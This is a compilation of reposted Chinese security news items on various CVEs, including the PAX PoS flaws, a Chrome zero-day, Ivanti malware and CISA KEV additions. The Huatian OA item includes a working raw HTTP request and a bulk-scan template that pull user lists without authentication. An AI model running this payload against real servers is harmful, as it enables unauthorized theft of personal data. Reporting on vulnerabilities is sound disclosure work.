渗透测试公司 STM Cyber 报告称，PAX Technology 的基于 Android 的 PoS（销售点）终端受到一系列漏洞的影响，这些漏洞可被利用来执行任意代码或命令。 PAX 总部位于中国，生产支付终端、密码键盘以及 PoS 硬件和软件，产品销往全球。PAX 的 PoS 设备在基于 Android 的 PayDroid 上运行。 据 STM Cyber 称，虽然沙箱可以防止终端上的应用程序相互交互，但具有 root 访问权限的攻击者可以篡改任何应用程序，包括支付流程。 尽管攻击者无法访问解密的支付信息，但他们可以修改交易金额和其他相关数据，STM Cyber 在 PAX PoS 设备中发现了六个漏洞，在一份技术报告中解释道，该报告还包括证明：概念（PoC）利用。 该公司表示，攻击者可以通过物理 USB 访问易受攻击的设备来利用其中三个问题。 第一个漏洞 CVE-2023-4818 允许攻击者将 PAX A920 设备的引导加载程序降级到以前的、可能存在漏洞的版本。然而，签名检查仅允许加载由 PAX 签名的引导加载程序。 第二个问题 CVE-2023-42134 允许攻击者注入内核参数并在任何 PAX PoS 设备上以 root 权限执行任意代码。该错误可以在快速启动模式下通过执行隐藏命令来覆盖未签名的分区来利用。 接下来是 CVE-2023-42135，这是一个类似的内核参数注入缺陷，导致通过刷新不同的未签名分区来执行代码。该问题影响 PAX A920Pro/A50 设备。 STM Cyber 解释说，影响所有 PAX PoS 终端的另外两个漏洞可以被攻击者利用 shell 访问易受攻击的设备来执行任意命令。 第一个漏洞编号为 CVE-2023-42136，允许攻击者注入以特定单词开头的 shell 命令，绕过现有检查并获得“系统”权限。 攻击者可以利用第二个缺陷 CVE-2023-42137 覆盖任意文件，并可能将其权限提升到系统或 root。 第六个安全缺陷（编号为 CVE-2023-42133）的详细信息尚未发布。 STM Cyber 于 2023 年 5 月向 PAX 报告了这些漏洞，并于 8 月通知了波兰 CERT。PAX 已发布针对所有漏洞的补丁。   转自安全客，原文链接：https://www.anquanke.com/post/id/292699 封面来源于网络，如有侵权请联系删除

谷歌发布了一项紧急更新，旨在修复 Chrome 浏览器中的三个高度严重的安全漏洞，并警告其中一个漏洞已被广泛利用。 被利用的零日漏洞被标记为 CVE-2024-0519，被描述为 V8 JavaScript 引擎中的越界内存访问问题。 按照惯例，谷歌未提供关于攻击范围的详细信息，也没有共享遥测数据来帮助防御者寻找妥协的迹象。 谷歌的一份简要声明指出：“谷歌已经获知了与 CVE-2024-0519 漏洞相关的报告。” 公司表示，这个零日漏洞是匿名报告的。 最新的 Chrome 浏览器更新还解决了 V8 中另外两个被评为高危的内存安全问题。谷歌表示，此次更新还包括了在内部通过审计、模糊测试等方式发现的多项修复。 就在几周前，谷歌发布了针对多个内存安全问题的补丁，这些问题使用户容易受到代码执行攻击的威胁。 2023 年，谷歌修复了至少 7 个在野外利用过程中发现的零日漏洞。   转自安全客，原文链接：https://www.anquanke.com/post/id/292683 封面来源于网络，如有侵权请联系删除

Bitdefender 警告物联网设备所有者面临新风险。 Bitdefender发现了 广泛使用的博世 BCC100家用Wi -Fi恒温器中的一个漏洞。该漏洞允许攻击者远程操纵设备设置（包括温度）并安装恶意软件。 所有物联网 ( IoT ) 设备，从咖啡机到安全摄像头，都可能面临黑客攻击的风险。Bitdefender 实验室创建了第一个智能家居网络安全中心，定期审核流行的物联网设备是否存在漏洞。他们的最新研究揭示了影响博世 BCC100 恒温器版本 1.7.0 到 HD 版本 4.13.22 的漏洞。 该安全漏洞于 2023 年 8 月 29 日被发现，但直到 2024 年 1 月 11 日该公司修复后才公布详细信息。CVE-2023-49722漏洞允许攻击者用恶意固件替换设备的固件，然后自行决定使用受感染的恒温器，从而完全控制其功能。 BCC100温控器使用两个微控制器：用于Wi-Fi功能的海飞芯片（HF-LPT230）和用于设备主逻辑的意法半导体芯片（STM32F103）。STM 芯片没有联网功能，依赖Wi-Fi 芯片进行通信。Wi-Fi 芯片侦听本地网络上的TCP 端口 8899，并通过 UART 数据总线将接收到的消息直接传输到主微控制器。 然而，如果消息格式良好，则微控制器无法区分恶意消息和云服务器发送的真实消息。攻击者可以利用它向恒温器发送任意命令，包括恶意更新。 恒温器通过 WebSocket 使用 JSON 数据包与服务器“connect.boschconnectedcontrol[.]com”进行通信，这很容易被欺骗。设备在端口8899上发出“device/update”命令，导致恒温器向云服务器查询信息。 尽管存在错误代码，设备仍接受带有更新详细信息的虚假响应，包括自定义URL 、大小、 MD5 校验和和固件版本。然后，设备请求云服务器下载固件并通过 WebSocket 传输，确保指定的 URL 可用。收到文件后，设备会执行更新，完成攻击。 为避免可能出现的风险，建议用户采取必要的安全措施，包括定期更新温控器固件、更改默认管理密码、避免未经授权的温控器连接互联网、使用防火墙限制未经授权的设备访问等。 值得注意的是，就在上周，另一家网络安全公司的专家透露了博世生产的另一款产品——广泛应用于各行业的联网工业冲击扳手——的多个漏洞细节。利用这些漏洞的后果是生产完全停止以及昂贵的设备损坏。 类似的研究再次提醒我们，即使看似无害的联网智能设备也可能给用户带来非常具体的安全风险。 随着智能设备市场的增长，制造商必须优先考虑安全性并确保安全可靠的连接环境，用户必须负责制造商的定期更新和其他建议。   转自安全客，原文链接：https://www.anquanke.com/post/id/292656 封面来源于网络，如有侵权请联系删除

近期，华天动力OA被爆存在未授权访问漏洞，攻击者可以读取用户信息及敏感信息等，利用 ZoomEye搜索引擎进行搜索，发现影响资产9000+。 华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。 未授权访问漏洞在企业内部属于常见问题，其通常是由于安全配置不当、认证页面存在缺陷，或者根本就没有认证导致的。 通过ZoomEye网络空间搜索引擎搜索语法 app:”华天动力 OA”，发现受影响资产9000+，主要分布在中国。 修复建议：鉴权，对接口进行用户鉴权 附：漏洞复现 POC POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1 Host: {} Content-Length: 283 Pragma: no-cache Accept: application/json, text/plain, */* Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: text/xml;charset=utf-8 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=E23F65531C015A84CE70FBBEAFDA5296Connection: close <buffalo-call> <method>getUserListById</method> <boolean>1</boolean> <string></string> <string>2</string> <string></string> <string></string> <boolean>1</boolean> <boolean>1</boolean> </buffalo-call> 批量检测POC（请自行搭建环境检测） id: huatian-OA-information-disclosure   info: name: huatian-OA-information-disclosure author: HackTwo severity: high     http: – raw: – | POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Cache-Control: no-cache Connection: close Content-Type: text/xml;charset=utf-8   <buffalo-call> <method>getUserListById</method> <boolean>1</boolean> <string></string> <string>2</string> <string></string> <string></string> <boolean>1</boolean> <boolean>1</boolean> </buffalo-call>   matchers-condition: and matchers: – type: dsl dsl: – ‘len(body)>1000’ 转自渗透安全HackTwo ，原文链接：https://mp.weixin.qq.com/s/J3xOw0geTaIbzwehk41DCQ 封面来源于网络，如有侵权请联系删除  

据网络安全公司趋势科技报告，Windows SmartScreen 中的一个最新漏洞在导致 Phemedrone Stealer 感染的攻击中被积极利用。 这一安全漏洞被标识为 CVE-2023-36025（CVSS 评分为 8.8），于 2023 年 11 月 14 日被曝光。微软当时发布了相应的补丁，而美国网络安全机构 CISA 也将其列入已知被利用漏洞目录，证实了在野外攻击中存在相关证据。 根据微软的通报，黑客可以通过向用户发送精心设计的互联网快捷方式文件（URL）并说服收件人点击它来利用该问题。 这家科技巨头表示：“黑客将能够绕过 Windows Defender SmartScreen 检查及其相关提示。” 在漏洞公开披露后，我们观察到黑客展示了对该漏洞的利用，并发布了各种概念验证 (PoC) 漏洞，并且许多黑客已将此漏洞的利用纳入其攻击链中。 现在，趋势科技报告称，恶意活动正在积极利用 CVE-2023-36025 来传播 Phemedrone Stealer，这是一种以前未知的恶意软件类型，可以从受感染的系统中获取大量信息。 Phemedrone Stealer 采用 C# 编写，可作为开源软件使用，并在 GitHub 和 Telegram 上积极维护。 除了从网络浏览器、加密货币钱包和各种消息应用程序（包括 Telegram、Steam 和 Discord）窃取数据之外，该威胁还会截取屏幕截图并收集系统信息，包括硬件详细信息和位置数据。 然后，收集到的信息通过 Telegram 泄露或发送到攻击者的命令与控制 (C&C) 服务器。 作为观察到的攻击的一部分，利用 CVE-2023-36025 的恶意 URL 文件托管在 Discord 或其他云服务上。执行后，这些文件会下载并执行一个控制面板项 (.cpl) 文件，该文件调用 rundll32.exe 来执行恶意 DLL，充当下一阶段的加载程序，该阶段托管在 GitHub 上。 下一阶段是一个模糊加载器，它从同一 GitHub 存储库获取 ZIP 文件。该存档包含实现持久性和加载下一阶段所需的文件，进而加载 Phemedrone Stealer 有效负载。 趋势科技指出：“尽管已经打了补丁，但黑客仍在继续寻找利用 CVE-2023-36025 并逃避 Windows Defender SmartScreen 保护的方法，以多种恶意软件类型感染用户，包括勒索软件和 Phemedrone Stealer 等窃取程序。”   转自安全客，原文链接：https://www.anquanke.com/post/id/292678 封面来源于网络，如有侵权请联系删除

Guardio Labs 的安全研究人员发现 Windows 和 macOS 操作系统的 Opera Web 浏览器存在严重缺陷。利用这些缺陷，攻击者可以在计算机的基本操作系统上运行任何文件，包括恶意文件。 专家将该漏洞命名为“MyFlaw”（文字游戏，直译为“我的漏洞”），因为它与“我的流程”功能相关联，该功能允许用户在移动设备和桌面设备之间同步消息和文件。 攻击者使用受其控制的浏览器扩展来实现这个漏洞，成功绕过了浏览器的沙箱和整个工作流程。该问题同时影响 Opera 和 Opera GX 的常规版本。 My Flow 具有类似聊天的界面，用于在智能手机和台式计算机之间共享笔记和文件。事实证明，来自该聊天的文件可以直接通过浏览器的网络界面启动，不受浏览器安全性的影响。 My Flow 的运行由名为“Opera Touch Background”的内置扩展来实现，该扩展负责与移动模拟设备进行通信。该扩展包含自己的清单文件，其中指定了其行为以及所有必要的权限，包括“externally_connectable”属性，该属性声明其他网页和扩展可以连接到它。 可以与扩展程序通信的域必须与模式“*.flow.opera.com”和“.flow.op-test.net”匹配，由浏览器开发人员自己控制。然而，Guardio Labs 研究人员在“web.flow.opera.com”域上发现了 My Flow 起始页的“被遗忘”版本。 找到的页面在视觉上与当前版本类似，但不同之处在于缺少内容安全策略标记以及存在调用JavaScript文件而不检查其完整性的脚本标记。 Guardio Labs 的报告称：“这正是攻击者所需要的——一种不安全、被遗忘且易受代码注入攻击的资源，并且具有对浏览器 API 的非常高的特权访问权限。” 最后的攻击链涉及攻击者创建一个特殊的扩展程序，将自己伪装成移动设备来与受害者的计算机进行通信，并通过修改后的 JavaScript 文件传输加密的恶意代码，以便随后只需点击用户的屏幕即可执行。 “MyFlaw”攻击方案 研究人员表示：“尽管在孤立的环境中运行，扩展程序仍然可以成为黑客的强大工具，使他们能够窃取信息并突破浏览器的安全边界。” Opera在2023年11月22日修复了这个漏洞，仅在漏洞被披露的5天后。开发人员还进行了服务器端修复，并采取了一系列措施来防止将来出现类似问题。出于安全原因，决定现在才公开披露该漏洞，以确保尽可能多的用户能够自动接收到必要的更新。   转自安全客，原文链接：https://www.anquanke.com/post/id/292647 封面来源于网络，如有侵权请联系删除

自 12月初以来，黑客一直在利用本周披露的 Ivanti Connect Secure 中的两个零日漏洞来部署多个定制恶意软件系列以用于间谍目的。 这些安全问题被标识为CVE-2023-46805 和 CVE-2024-21887，允许绕过身份验证并向易受攻击的系统注入任意命令。Ivanti 表示，攻击者针对的是少数客户。 与 Ivanti 合作调查该事件的Mandiant的一份报告指出，攻击背后的攻击者从事间谍活动，目前在内部追踪为 UNC5221。 Shadowserver扫描仪在公共网络上检测到 17,100 台 Invanti CS 设备，其中大部分位于美国。 攻击面的影响范围 部署的恶意软件 Mandiant 发现 UNC5221 在攻击后阶段使用了一组工具，其中包括五种自定义恶意软件，用于植入 Webshell、执行命令、删除有效负载和窃取凭据。 以下是攻击中使用的工具的摘要： Zipline     Passive Backdoor：自定义恶意软件，可以拦截网络流量，支持上传/下载操作，创建反向 shell、代理服务器、服务器隧道 Thinspool     Dropper：自定义     shell 脚本 dropper，将 Lightwire Web shell 写入 Ivanti CS，确保持久性 Wirefire     Web shell：基于 Python 的自定义 Web shell，支持未经身份验证的任意命令执行和负载删除 Lightwire     Web shell：嵌入合法文件中的自定义 Perl Web shell，可实现任意命令执行 Warpwire     harverster：基于 JavaScript 的自定义工具，用于在登录时收集凭据，并将其发送到命令和控制（C2）服务器 PySoxy     隧道器：促进网络流量隧道的隐蔽性 BusyBox：多调用二进制文件，结合了各种系统任务中使用的许多     Unix 实用程序 Thinspool     实用程序 (sessionserver.pl)：用于将文件系统重新挂载为“读/写”以启用恶意软件部署 “ZIPLINE 是这些家族中最著名的一个，它是一个被动后门，可以劫持 libsecure\.so 中的导出函数accept()。ZIPLINE 拦截传入的网络流量并支持文件传输、反向 shell、隧道和代理。 ”Mandiant 安全研究员表示。 Zipline (Mandiant)支持的命令 Mandiant 还发现，攻击者使用受损的报废 Cyberoam VPN 设备作为 C2 服务器，并将其位置设置在与目标相同的区域，以逃避检测。 Volexity 此前曾报道称，有迹象表明这些攻击是由某国背景的黑客组织发起。Mandiant 的报告没有明确任何归属，也没有提供有关该黑客组织的潜在来源或从属关系的信息。 谷歌公司表示，没有足够的数据来自信地评估 UNC5221 的来源，并指出其活动与任何先前已知的威胁组织无关。 Mandiant 怀疑 UNC5221 是一种针对高优先级目标的高级持续威胁 (APT)。 安全专家提醒系统管理员，目前没有解决这两个0day漏洞的安全更新，Ivanti 提供了应立即实施的缓解措施。     转自会杀毒的单反狗，原文链接：https://mp.weixin.qq.com/s/MLzP72_NsdOZnGE8iFO0gg 封面来源于网络，如有侵权请联系删除

CISA 警告说，攻击者现在正在利用一个关键的 Microsoft SharePoint 权限提升漏洞，该漏洞可以与另一个关键漏洞相结合以实现远程代码执行。 该安全漏洞的编号为CVE-2023-29357，该安全漏洞使远程攻击者能够通过使用欺骗性 JWT 身份验证令牌绕过身份验证，从而在未修补的服务器上获得管理员权限。 微软在公告中解释说：“获得欺骗性 JWT 身份验证令牌的攻击者可以使用它们来执行网络攻击，绕过身份验证并允许他们获得经过身份验证的用户的权限。” “成功利用此漏洞的攻击者可以获得管理员权限。攻击者不需要任何权限，用户也不需要执行任何操作。” 将此缺陷与CVE-2023-24955 SharePoint Server 远程代码执行漏洞链接起来时，远程攻击者还可以通过命令注入在受感染的 SharePoint 服务器上执行任意代码。 STAR Labs 研究员Jang (Nguyễn Tiến Giang)在去年 2023 年 3 月于温哥华举行的 Pwn2Own 竞赛中成功演示了这个 Microsoft SharePoint Server 漏洞链，并获得了 100,000 美元的奖励。 研究人员于 9 月 25 日发布了一份技术分析报告，详细描述了利用过程。演示视频链接：https://youtu.be/x0DPpVh8fO4 就在一天后，一名安全研究人员还在 GitHub 上发布了 CVE-2023-29357 概念验证漏洞。 尽管该漏洞无法在目标系统上远程执行代码，但由于它不是 Pwn2Own 演示的链的完整漏洞，其作者表示，攻击者可以将其与 CVE-2023-24955 漏洞本身链接起来进行 RCE。 PoC 漏洞利用的开发人员表示：“该脚本会输出管理员用户的详细信息，并且可以在单一和大规模利用模式下运行。该脚本不包含执行 RCE 的功能，并且仅用于教育目的以及合法和授权的测试。” 之后，该漏洞利用链的其他 PoC 漏洞在网上出现，降低了漏洞利用门槛，甚至允许技能较低的攻击者在野外利用中部署它。 虽然尚未提供有关 CVE-2023-29357 主动利用的更多详细信息，但 CISA 已将该漏洞添加到其已知被利用的漏洞目录中，现在要求美国联邦机构在本月底（即 1 月 31 日）之前修复该漏洞。   转自会杀毒的单反狗，原文链接：https://mp.weixin.qq.com/s/5wNwPmKzFjfYqB-D6wc-QA 封面来源于网络，如有侵权请联系删除

近日，思科修补了一个关键的 Unity Connection 安全漏洞，该漏洞可让未经认证的攻击者在未打补丁的设备上远程获得 root 权限。 Unity Connection 是一个完全虚拟化的消息和语音邮件解决方案，适用于电子邮件收件箱、Web 浏览器、Cisco Jabber、Cisco Unified IP Phone、智能手机或平板电脑，支持高可用性和冗余。 该漏洞（CVE-2024-20272）出现在该软件基于网络的管理界面上，是由于特定 API 缺乏身份验证以及对用户提供的数据验证不当造成的。攻击者可通过向目标和易受攻击系统上传任意文件，在底层操作系统上执行命令。成功利用后，攻击者可以在系统上存储恶意文件，在操作系统上执行任意命令，并将权限提升至 root。 幸运的是，思科的产品安全事故响应小组（PSIRT）表示，目前还没有证据表明该漏洞已被利用的情况出现。 利用 PoC 漏洞进行命令注入 昨天（1月10日），思科宣布修补了多款产品中的十个中等严重性安全漏洞，这些漏洞允许攻击者升级权限、发起跨站脚本（XSS）攻击、注入命令等。 其中一个漏洞的概念验证利用代码已在网上公布，该漏洞是思科 WAP371 无线接入点基于 Web 的管理界面中的一个命令注入漏洞，被追踪为 CVE-2024-20287。 尽管攻击者可以利用这个漏洞在未打补丁的设备上以 root 权限执行任意命令，但要成功利用这个漏洞还需要管理凭据。 思科表示，由于思科WAP371设备已于2019年6月达到报废年限，因此不会发布固件更新来修补 CVE-2024-20287 安全漏洞。 同时，该公司建议网络上有 WAP371 设备的客户尽快迁移到思科 Business 240AC 接入点。 去年10 月，思科还修补了两个零日漏洞（CVE-2023-20198 和 CVE-2023-20273），这些漏洞在一周内被利用入侵了 50,000 多台 IOS XE 设备。   转自FreeBuf.COM，原文链接：https://www.freebuf.com/news/389437.html 封面来源于网络，如有侵权请联系删除

HackerNews 编译，转载请注明出处： 美国网络安全和基础设施安全局在其 “已知被利用漏洞目录”中增加了六个漏洞，这些漏洞影响了苹果、Adobe、Apache、D-Link 和 Joomla 的产品。 已知被利用漏洞目录（简称 KEV）记录了在野攻击中被利用的安全问题，为全球组织在漏洞管理和处理优先级提供了重要参考。 CISA指出：“这些漏洞类型经常被黑客用作攻击手段，对联邦机构构成了重要威胁。” CISA 已经要求联邦机构在 1 月 29 日之前修补这六个正在被积极利用的漏洞，否则将停止使用这些存在漏洞的产品。 这次重点发现的六个漏洞如下： CVE-2023-27524：Apache Superset 2.0.1 版本及以下的不安全默认资源初始化问题，可能导致未经授权的访问。（评分：8.9 “高危”） CVE-2023-23752：Joomla! 4.0.0 至 4.2.7 版本中的不当访问检查可能导致未授权访问。（评分：5.3 “中危”） CVE-2023-41990：处理 iMessage 附件的字体文件中存在的远程代码执行漏洞，可能导致 iOS 16.2 及更早版本的 Apple iPhone 设备受到攻击。（评分：7.8 “高危”） CVE-2023-38203 和 CVE-2023-29300：Adobe ColdFusion 中的不受信任数据反序列化问题可能导致任意代码执行，无需用户交互。（评分：9.8 “关键危险”） CVE-2016-20017：D-Link DSL-2750B 1.05 版本之前的设备存在远程未认证命令注入漏洞，从 2016 年至 2022 年被活跃利用。（评分：9.8 “关键危险”） 其中一些列出的漏洞最近才被披露。 例如，CVE-2023-41990 早在 2019 年的 “三角测量行动” 中使用，一直到 2023 年 6 月 Kaspersky 的一些研究人员的设备受到感染时才被发现。 该漏洞是四个漏洞集合中的最后一个，黑客正在利用它来规避全球多个目标的安全防护措施，其中包括欧洲地区的 iPhone。 CVE-2023-38203 和 CVE-2023-29300 从 2023 年中期开始受到黑客利用，因为安全研究人员发现供应商的修复措施可以被绕过。 针对诸如 CVE-2023-27524 等漏洞，其 PoC 利用在去年 9 月已经公开，这可能加剧了黑客的利用活动。 建议所有组织和联邦机构检查其上述漏洞及 KEV 目录中的其他安全问题，并及时采取安全更新或其他必要的防护措施。   消息来源：bleepingcomputer，译者：Claire；   本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文